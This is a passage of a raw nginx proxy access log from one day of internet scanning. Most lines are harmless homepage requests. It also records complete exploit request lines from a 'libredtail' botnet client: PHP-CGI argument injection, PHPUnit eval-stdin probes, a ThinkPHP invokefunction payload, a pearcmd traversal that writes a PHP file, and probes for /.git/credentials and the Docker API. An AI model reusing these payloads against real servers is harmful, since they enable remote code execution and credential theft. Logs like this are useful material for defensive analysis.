18.218.118.203] [Length 0] [Gzip -] "-" "-" -[17/Feb/2026:06:59:58 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 165.154.227.13] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:06:59:59 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 165.154.227.13] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:07:00:00 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:00 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 165.154.227.13] [Length 154] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:01 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:01 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:02 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:02 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:03 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:04 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:05 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:05 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:06 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:07 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:07 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:08 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:08 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:08 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:09 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:09 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:10 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:10 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:11 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:11 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:12 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:13 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:13 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:14 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:15 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:15 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:16 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:16 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:17 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:18 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:18 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:19 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:20 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:20 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:21 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:21 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:22 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:23 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:23 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:24 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:24 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:00:25 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 165.154.227.13] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:07:08:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:07:20:12 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:07:33:41 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:07:40:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:07:45:27 +0000] 200 - GET http 222.117.41.51 "/" [Client 35.203.210.153] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[17/Feb/2026:07:50:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.157.150.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[17/Feb/2026:07:55:38 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:08:03:58 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:08:11:07 +0000] 404 - GET http 222.117.41.51 "/.git/credentials" [Client 195.178.110.162] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" "-" -[17/Feb/2026:08:21:52 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:08:23:09 +0000] 400 - - http localhost "-" [Client 167.99.148.142] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:08:23:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:08:31:56 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:08:36:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "Hello World/1.0" "-" -[17/Feb/2026:08:38:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:08:47:16 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:08:49:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:09:13:04 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:09:23:54 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:09:29:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 43.130.141.193] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[17/Feb/2026:09:35:32 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 173.212.241.115] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:09:35:33 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 173.212.241.115] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:09:35:33 +0000] 404 - POST http 222.117.41.51 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:33 +0000] 405 - POST http 222.117.41.51 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 173.212.241.115] [Length 154] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:34 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:34 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:34 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:34 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:35 +0000] 404 - GET http 222.117.41.51 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:35 +0000] 404 - GET http 222.117.41.51 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:35 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:36 +0000] 404 - GET http 222.117.41.51 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:36 +0000] 404 - GET http 222.117.41.51 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:36 +0000] 404 - GET http 222.117.41.51 "/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:37 +0000] 404 - GET http 222.117.41.51 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:38 +0000] 404 - GET http 222.117.41.51 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:38 +0000] 404 - GET http 222.117.41.51 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:38 +0000] 404 - GET http 222.117.41.51 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:39 +0000] 404 - GET http 222.117.41.51 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:39 +0000] 404 - GET http 222.117.41.51 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:39 +0000] 404 - GET http 222.117.41.51 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:39 +0000] 404 - GET http 222.117.41.51 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:40 +0000] 404 - GET http 222.117.41.51 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:40 +0000] 404 - GET http 222.117.41.51 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:40 +0000] 404 - GET http 222.117.41.51 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:41 +0000] 404 - GET http 222.117.41.51 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:41 +0000] 404 - GET http 222.117.41.51 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:41 +0000] 404 - GET http 222.117.41.51 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:41 +0000] 404 - GET http 222.117.41.51 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:42 +0000] 404 - GET http 222.117.41.51 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:42 +0000] 404 - GET http 222.117.41.51 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:42 +0000] 404 - GET http 222.117.41.51 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:43 +0000] 404 - GET http 222.117.41.51 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:43 +0000] 404 - GET http 222.117.41.51 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:43 +0000] 404 - GET http 222.117.41.51 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:44 +0000] 404 - GET http 222.117.41.51 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:44 +0000] 404 - GET http 222.117.41.51 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:44 +0000] 404 - GET http 222.117.41.51 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:44 +0000] 404 - GET http 222.117.41.51 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:45 +0000] 404 - GET http 222.117.41.51 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:45 +0000] 403 - GET http 222.117.41.51 "/index.php?lang=../../../../../../../../tmp/index1" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:35:46 +0000] 404 - GET http 222.117.41.51 "/containers/json" [Client 173.212.241.115] [Length 150] [Gzip -] "libredtail-http" "-" -[17/Feb/2026:09:36:17 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:09:37:20 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:09:46:32 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.153.34.187] [Length 1033] [Gzip -] "Mozilla/5.0" "-" -[17/Feb/2026:09:47:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 65.49.20.66] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:10:02:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 89.42.231.200] [Length 1033] [Gzip -] "-" "-" -[17/Feb/2026:10:04:03 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.91.64.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" "-" -[17/Feb/2026:10:04:04 +0000] 400 - GET http 222.117.41.51 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" -[17/Feb/2026:10:04:26 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:10:14:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 135.237.127.225] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:10:20:06 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:10:27:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" -[17/Feb/2026:10:30:11 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:10:31:43 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:10:53:07 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:11:19:24 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:11:23:45 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:11:24:09 +0000] 200 - GET http 222.117.41.51 "/" [Client 45.194.92.25] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[17/Feb/2026:11:38:01 +0000] 200 - GET http 222.117.41.51 "/" [Client 20.127.224.63] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[17/Feb/2026:11:43:49 +0000] 200 - GET http 222.117.41.51 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 